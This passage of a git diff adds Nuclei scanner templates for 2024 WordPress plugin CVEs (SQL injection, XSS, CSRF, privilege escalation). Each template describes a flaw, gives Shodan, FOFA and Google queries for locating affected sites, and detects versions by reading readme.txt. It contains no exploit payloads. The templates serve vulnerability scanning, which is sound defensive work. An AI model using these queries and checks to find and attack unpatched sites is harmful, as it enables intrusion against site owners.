3.0.2 - Authenticated (Admin+) SQL Injection + author: topscoder + severity: low + description: > + The Connexion Logs plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.0.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/699fc7f8-ed1f-465c-be37-f27a9dd74076?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 + cve-id: CVE-2024-11372 + metadata: + fofa-query: "wp-content/plugins/logs-de-connexion/" + google-query: inurl:"/wp-content/plugins/logs-de-connexion/" + shodan-query: 'vuln:CVE-2024-11372' + tags: cve,wordpress,wp-plugin,logs-de-connexion,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/logs-de-connexion/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "logs-de-connexion" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11373.yaml b/poc/cve/CVE-2024-11373.yaml new file mode 100644 index 0000000000..6f766b3f3c --- /dev/null +++ b/poc/cve/CVE-2024-11373.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11373-b5dca7f583f1b8366026d4d92294f88d + +info: + name: > + Connexion Logs <= 3.0.2 - Cross-Site Request Forgery to Log Deletion + author: topscoder + severity: medium + description: > + The Connexion Logs plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to delete logs via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ef0abec6-7d4b-4a1f-8116-e31d60bc34b0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-11373 + metadata: + fofa-query: "wp-content/plugins/logs-de-connexion/" + google-query: inurl:"/wp-content/plugins/logs-de-connexion/" + shodan-query: 'vuln:CVE-2024-11373' + tags: cve,wordpress,wp-plugin,logs-de-connexion,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/logs-de-connexion/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "logs-de-connexion" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11417-e70cae6d6cbde8c3b8b47fc874959a2c.yaml b/poc/cve/CVE-2024-11417-e70cae6d6cbde8c3b8b47fc874959a2c.yaml new file mode 100644 index 0000000000..9f26c0becf --- /dev/null +++ b/poc/cve/CVE-2024-11417-e70cae6d6cbde8c3b8b47fc874959a2c.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11417-e70cae6d6cbde8c3b8b47fc874959a2c + +info: + name: > + dejure.org Vernetzungsfunktion <= 1.97.5 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The dejure.org Vernetzungsfunktion plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.97.5. This is due to missing or incorrect nonce validation on the djo_einstellungen_menue() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bfe35762-2cb1-4b62-8865-ab217ff29450?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11417 + metadata: + fofa-query: "wp-content/plugins/dejureorg-vernetzungsfunktion/" + google-query: inurl:"/wp-content/plugins/dejureorg-vernetzungsfunktion/" + shodan-query: 'vuln:CVE-2024-11417' + tags: cve,wordpress,wp-plugin,dejureorg-vernetzungsfunktion,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/dejureorg-vernetzungsfunktion/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "dejureorg-vernetzungsfunktion" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.97.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11462-8df69847f3be73a75d55847984a2d955.yaml b/poc/cve/CVE-2024-11462-8df69847f3be73a75d55847984a2d955.yaml new file mode 100644 index 0000000000..e06cece275 --- /dev/null +++ b/poc/cve/CVE-2024-11462-8df69847f3be73a75d55847984a2d955.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11462-8df69847f3be73a75d55847984a2d955 + +info: + name: > + Filestack Official <= 2.0.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Filestack Official plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'fstab' and 'filestack_options' parameters in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/559a94d8-527d-48b3-a917-461ebfa012bc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11462 + metadata: + fofa-query: "wp-content/plugins/filestack-upload/" + google-query: inurl:"/wp-content/plugins/filestack-upload/" + shodan-query: 'vuln:CVE-2024-11462' + tags: cve,wordpress,wp-plugin,filestack-upload,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/filestack-upload/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "filestack-upload" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11502.yaml b/poc/cve/CVE-2024-11502.yaml new file mode 100644 index 0000000000..a49cd7b211 --- /dev/null +++ b/poc/cve/CVE-2024-11502.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11502-e69268cf79e16efe674087f9897a7a26 + +info: + name: > + Planning Center Online Giving <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode + author: topscoder + severity: low + description: > + The Planning Center Online Giving plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bb991940-b4ed-4b64-be59-afe37eaf3a2c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11502 + metadata: + fofa-query: "wp-content/plugins/planning-center-online-giving/" + google-query: inurl:"/wp-content/plugins/planning-center-online-giving/" + shodan-query: 'vuln:CVE-2024-11502' + tags: cve,wordpress,wp-plugin,planning-center-online-giving,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/planning-center-online-giving/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "planning-center-online-giving" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11710-6b40285fd670b260b17a7200ea944ea1.yaml b/poc/cve/CVE-2024-11710-6b40285fd670b260b17a7200ea944ea1.yaml new file mode 100644 index 0000000000..c1bdd45dd2 --- /dev/null +++ b/poc/cve/CVE-2024-11710-6b40285fd670b260b17a7200ea944ea1.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11710-6b40285fd670b260b17a7200ea944ea1 + +info: + name: > + WP Job Portal <= 2.2.2 - Authenticated (Admin+) SQL Injection + author: topscoder + severity: low + description: > + The WP Job Portal – A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to SQL Injection via the 'fieldfor', 'visibleParent' and 'id' parameters in all versions up to, and including, 2.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/80fcaea8-5837-4d8c-afef-b9ed4fd31227?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 + cve-id: CVE-2024-11710 + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:CVE-2024-11710' + tags: cve,wordpress,wp-plugin,wp-job-portal,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11711-3280cdf3709d95c508956c22254e4c2e.yaml b/poc/cve/CVE-2024-11711-3280cdf3709d95c508956c22254e4c2e.yaml new file mode 100644 index 0000000000..37faf0ff16 --- /dev/null +++ b/poc/cve/CVE-2024-11711-3280cdf3709d95c508956c22254e4c2e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11711-3280cdf3709d95c508956c22254e4c2e + +info: + name: > + WP Job Portal <= 2.2.1 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + The WP Job Portal – A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to SQL Injection via the 'resumeid' parameter in all versions up to, and including, 2.2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5d8961fd-68ac-4a10-ab26-cfcda27c18e8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-11711 + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:CVE-2024-11711' + tags: cve,wordpress,wp-plugin,wp-job-portal,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11712-c31e31d712beebffc1ade29e9e31eb47.yaml b/poc/cve/CVE-2024-11712-c31e31d712beebffc1ade29e9e31eb47.yaml new file mode 100644 index 0000000000..c4d5bee4a5 --- /dev/null +++ b/poc/cve/CVE-2024-11712-c31e31d712beebffc1ade29e9e31eb47.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11712-c31e31d712beebffc1ade29e9e31eb47 + +info: + name: > + WP Job Portal <= 2.2.2 - Missing Authorization to Unauthenticated Arbitrary Resume Download + author: topscoder + severity: high + description: > + The WP Job Portal – A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the getResumeFileDownloadById() function in all versions up to, and including, 2.2.2. This makes it possible for unauthenticated attackers to download other users resumes. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ecc87d5f-dba4-40f8-946f-f2634614b579?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-11712 + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:CVE-2024-11712' + tags: cve,wordpress,wp-plugin,wp-job-portal,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11713-3ce068c28a3bf30675cdafd7af7432b5.yaml b/poc/cve/CVE-2024-11713-3ce068c28a3bf30675cdafd7af7432b5.yaml new file mode 100644 index 0000000000..88f190a58d --- /dev/null +++ b/poc/cve/CVE-2024-11713-3ce068c28a3bf30675cdafd7af7432b5.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11713-3ce068c28a3bf30675cdafd7af7432b5 + +info: + name: > + WP Job Portal <= 2.2.2 - Authenticated (Admin+) SQL Injection via wpjobportal_deactivate() + author: topscoder + severity: low + description: > + The WP Job Portal – A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to SQL Injection via the 'page_id' parameter of the wpjobportal_deactivate() function in all versions up to, and including, 2.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4d67675a-b77b-41c6-a94f-d9385e609b37?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 + cve-id: CVE-2024-11713 + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:CVE-2024-11713' + tags: cve,wordpress,wp-plugin,wp-job-portal,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11714-6e3bac814e83994dd0e0e3a82cd823a9.yaml b/poc/cve/CVE-2024-11714-6e3bac814e83994dd0e0e3a82cd823a9.yaml new file mode 100644 index 0000000000..51e62ccca7 --- /dev/null +++ b/poc/cve/CVE-2024-11714-6e3bac814e83994dd0e0e3a82cd823a9.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11714-6e3bac814e83994dd0e0e3a82cd823a9 + +info: + name: > + WP Job Portal <= 2.2.2 - Authenticated (Admin+) SQL Injection via getFieldsForVisibleCombobox() + author: topscoder + severity: low + description: > + The WP Job Portal – A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to SQL Injection via the 'ff' parameter of the getFieldsForVisibleCombobox() function in all versions up to, and including, 2.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/505858dc-c420-484c-a067-6962836eea6a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 + cve-id: CVE-2024-11714 + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:CVE-2024-11714' + tags: cve,wordpress,wp-plugin,wp-job-portal,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11715-f8ac92a9956b6a02eeac6f3837fff40b.yaml b/poc/cve/CVE-2024-11715-f8ac92a9956b6a02eeac6f3837fff40b.yaml new file mode 100644 index 0000000000..6a0d70eec6 --- /dev/null +++ b/poc/cve/CVE-2024-11715-f8ac92a9956b6a02eeac6f3837fff40b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11715-f8ac92a9956b6a02eeac6f3837fff40b + +info: + name: > + WP Job Portal <= 2.2.2 - Missing Authorization to Limited Privilege Escalation + author: topscoder + severity: high + description: > + The WP Job Portal – A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the assignUserRole() function in all versions up to, and including, 2.2.2. This makes it possible for unauthenticated attackers to elevate their privileges to that of an employer. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4107199d-e3c7-4379-b39d-1868de7d777b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2024-11715 + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:CVE-2024-11715' + tags: cve,wordpress,wp-plugin,wp-job-portal,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11720-d0f4b1ce743d359b9844d3054e4a5af9.yaml b/poc/cve/CVE-2024-11720-d0f4b1ce743d359b9844d3054e4a5af9.yaml new file mode 100644 index 0000000000..61a057d2b2 --- /dev/null +++ b/poc/cve/CVE-2024-11720-d0f4b1ce743d359b9844d3054e4a5af9.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11720-d0f4b1ce743d359b9844d3054e4a5af9 + +info: + name: > + Frontend Admin by DynamiApps <= 3.24.5 - Unauthenticated Stored Cross-Site Scripting + author: topscoder + severity: high + description: > + The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via submission forms in all versions up to, and including, 3.24.5 due to insufficient input sanitization and output escaping on the new Taxonomy form. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is only exploitable when lower-level users have been granted access to submit specific forms, which is disabled by default. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/69a464f4-c357-446f-a5b8-0919d9af56c9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2024-11720 + metadata: + fofa-query: "wp-content/plugins/acf-frontend-form-element/" + google-query: inurl:"/wp-content/plugins/acf-frontend-form-element/" + shodan-query: 'vuln:CVE-2024-11720' + tags: cve,wordpress,wp-plugin,acf-frontend-form-element,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/acf-frontend-form-element/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "acf-frontend-form-element" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.24.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11721-dc2aa37d169a99daa955380439331a02.yaml b/poc/cve/CVE-2024-11721-dc2aa37d169a99daa955380439331a02.yaml new file mode 100644 index 0000000000..7e8658fc18 --- /dev/null +++ b/poc/cve/CVE-2024-11721-dc2aa37d169a99daa955380439331a02.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11721-dc2aa37d169a99daa955380439331a02 + +info: + name: > + Frontend Admin by DynamiApps <= 3.24.5 - Unauthenticated Privilege Escalation + author: topscoder + severity: high + description: > + The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.24.5. This is due to insufficient controls on the user role select field when utilizing the 'Role' field in a form. This makes it possible for unauthenticated attackers to create new administrative user accounts, even when the administrative user role has not been provided as an option to the user, granted that unauthenticated users have been provided access to the form. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e9fdc833-8384-42c0-ad9b-72e5b6351964?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-11721 + metadata: + fofa-query: "wp-content/plugins/acf-frontend-form-element/" + google-query: inurl:"/wp-content/plugins/acf-frontend-form-element/" + shodan-query: 'vuln:CVE-2024-11721' + tags: cve,wordpress,wp-plugin,acf-frontend-form-element,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/acf-frontend-form-element/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "acf-frontend-form-element" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.24.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11751-fd6fb920fe0d64ca3888bb1674349134.yaml b/poc/cve/CVE-2024-11751-fd6fb920fe0d64ca3888bb1674349134.yaml new file mode 100644 index 0000000000..0d864767c6 --- /dev/null +++ b/poc/cve/CVE-2024-11751-fd6fb920fe0d64ca3888bb1674349134.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11751-fd6fb920fe0d64ca3888bb1674349134 + +info: + name: > + TCBD Popover <= 1.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The TCBD Popover plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tcbd-popover-image ' shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3b08f533-9c74-4be3-99ff-70a3d9b90358?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11751 + metadata: + fofa-query: "wp-content/plugins/tcbd-popover/" + google-query: inurl:"/wp-content/plugins/tcbd-popover/" + shodan-query: 'vuln:CVE-2024-11751' + tags: cve,wordpress,wp-plugin,tcbd-popover,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tcbd-popover/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tcbd-popover" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11752-932bb2de288ef26bc4c101684c7cb531.yaml b/poc/cve/CVE-2024-11752-932bb2de288ef26bc4c101684c7cb531.yaml new file mode 100644 index 0000000000..f9fc94d548 --- /dev/null +++ b/poc/cve/CVE-2024-11752-932bb2de288ef26bc4c101684c7cb531.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11752-932bb2de288ef26bc4c101684c7cb531 + +info: + name: > + Eveeno <= 1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Eveeno plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'eveeno' shortcode in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e254f0ba-9008-44e9-bf8f-31c9614d6f64?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11752 + metadata: + fofa-query: "wp-content/plugins/eveeno/" + google-query: inurl:"/wp-content/plugins/eveeno/" + shodan-query: 'vuln:CVE-2024-11752' + tags: cve,wordpress,wp-plugin,eveeno,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/eveeno/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "eveeno" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11754.yaml b/poc/cve/CVE-2024-11754.yaml new file mode 100644 index 0000000000..94b30021d3 --- /dev/null +++ b/poc/cve/CVE-2024-11754.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11754-f1c9edc69abf1d1c2adb003324039811 + +info: + name: > + Booking System Trafft <= 1.0.6 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Booking System Trafft plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'trafftbooking' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - 